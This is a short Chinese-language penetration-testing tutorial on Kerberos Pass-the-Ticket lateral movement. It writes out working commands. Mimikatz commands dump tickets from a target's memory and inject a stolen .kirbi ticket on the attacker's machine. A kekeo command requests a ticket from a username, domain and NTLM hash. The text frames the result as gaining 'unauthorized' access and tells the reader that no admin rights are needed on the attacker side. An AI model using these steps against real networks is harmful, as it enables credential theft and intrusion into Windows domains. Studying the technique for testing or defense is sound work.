今天咱们来尝试一个横向渗透方式，不需要管理员权限就可以获得远程系统的访问权限，Pass The Ticket 票据传递（PTT攻击）实现「未授权」访问。

带你了解「安全评估与渗透测试」 作者 ailx10

1、使用mimikatz进行票据传递

使用横向移动神器mimikatz可以将内存中的票据导出来，首先在目标机器上以管理员权限运行下面的命令，就可以直接导出一堆不同主机的票据信息（KIRBI文件），从中选择一个目标系统自己的，移动到黑客机器上。（顺便说一下，直接在黑客机器上也能拿到目标机器的票据～）

• 在目标机器上以管理员权限，输入命令，获得票据
• 将票据移动到黑客机器上

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

只要拿到了目标机器的票据，那么就可以在黑客机器上实现「未授权访问」～

• 在黑客机器上输入命令，得到OK提示，就是成功了
• 注意这里的引号是3个，别输入错了
• 不需要管理员权限哦～

mimikatz.exe "kerberos::ptt "[0;34c63]-2-0-60a10000-ailx00@krbtgt-HACKBIJI.TOP.kirbi"

最后，让我们一起见证奇迹吧，喜悦～

• 票据传递方便，实用
• 票据传递成功率更高

2、实用kekeo进行票据传递

• kekeo下载地址：github项目地址
• kekeo也是一款开源的票据传递工具
• kekeo需要指定域名、用户名、NTLM哈希来生成票据

也是在目标机器上运行，下面的命令，只需要普通权限就可以了。

kekeo.exe "tgt::ask /user:ailx00 /domain:hackbiji.top /ntlm:8155bcb25220245086d66e6333898426"

运行后，就会生成ailx00的票据，把这个票据移动到黑客的机器上。

• 在黑客机器上，直接输入命令，显示OK就成功
• 不需要管理员权限
• 注意这里是3个引号

最后，让我们一起见证奇迹吧

• 票据传递方便，实用
• 票据传递成功率更高

本篇完～